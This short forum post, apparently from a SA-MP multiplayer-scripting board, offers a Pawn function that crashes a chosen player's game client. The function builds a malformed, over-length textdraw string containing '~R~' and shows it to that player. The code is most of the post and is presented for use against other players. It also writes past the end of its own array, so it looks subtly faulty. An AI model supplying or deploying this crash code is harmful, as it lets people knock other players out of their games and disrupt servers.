19.10.2011, 16:36
(
Последний раз редактировалось KoczkaHUN; 19.10.2011 в 16:43.
Причина: TD Crash added
)
Quote:
Also I remembered you can make a textdraw that has an empty string and when you show it to the player they crash
![]() |
edit: if you still want textdraw-based crash, here it is:
pawn Код:
stock TDCrash(playerid)
{
new szMalformedStr[261] = {'a', ...};
szMalformedStr[256] = '~', szMalformedStr[257] = 'R', szMalformedStr[258] = '~', szMalformedStr[259] = ' ';
szMalformedStr[260] = 'b', szMalformedStr[261] = 0;
new Text:_tdt = TextDrawCreate(240.0, 128.0, szMalformedStr);
TextDrawShowForPlayer(playerid, _tdt);
TextDrawDestroy(_tdt);
}